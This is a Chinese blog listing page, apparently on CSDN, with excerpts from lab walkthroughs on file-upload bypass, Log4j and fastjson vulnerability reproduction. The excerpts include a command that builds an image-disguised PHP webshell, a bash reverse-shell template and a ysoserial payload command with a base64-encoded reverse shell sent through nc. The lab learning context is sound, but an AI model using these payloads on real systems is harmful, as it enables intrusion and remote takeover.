自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 关于第一关文件上传的第一关的过程

copy xjh.png/b+xjh.php tpm.jpg------------图片码制作的代码(前面是图片---后面是一句话木马)(7) 在蚁剑中右键打开终端,先查看id / pwd / uname -a。(8)最后输入寻找的flag的命令。步骤三:找到flag 提交flag值,靶场完成。

2025-10-26 10:28:26 245

原创 Burp抓包+nginx靶场漏洞复现实战

思路二:在.php后缀上传失败,将2.php 修改1.gif的文件来进行burp 抓包,改包来进行测试。通过.php文件测试,来看不可以,.php是在黑名单中。思路一:尝试简单的上传.php 的文件。使用http://开启靶场的IP :8080(来查看其中的实验的场景):确认靶场开启没有问题,经过查看实验的场景,提供了一个文件上传的页面。:查看是否开启了靶场(docker ps 查看开启的端口,)2: 需要下载nginx的靶场,1:需要应用Burp 抓包工具。(只是修改后缀名 ,不修改文件的内容。

2025-09-13 11:49:53 420

原创 log4j2-CVE-2021-44228漏洞复现

一:漏洞介绍:Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。3: 在Burp 替换完 发送。修改内容:(这里的内容可以复制我的,也可以在靶场环境中。2.9:执行后出现紫色的代码-使用1.8版本的 rmi(2.4:先准备实验准备的工具 ,下载了放到kali里。2.5:java需要11版本的 如果不是需要下载。2.3 :使用Burp抓网页的包,进行修改内容。将编码的放到bash反弹中(红线替换)

2025-08-13 10:57:27 288

原创 log4jCVE-2017-5645漏洞复现

执行代码中( java -jar ysoserial-all.jarCommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuOS8xMjM0NSAwPiYx}|{base64,- d}|{bash,-i}" | nc 172.20.10.9 4712)bash -i >& /dev/tcp/kali IP / 端口 0>&1---转化为Base64编码。3:虚拟机和主机可以相互ping通。

2025-08-08 09:59:55 467

原创 fastjson 1.2.24-rce漏洞复现

fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)

2025-08-06 14:44:43 492

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除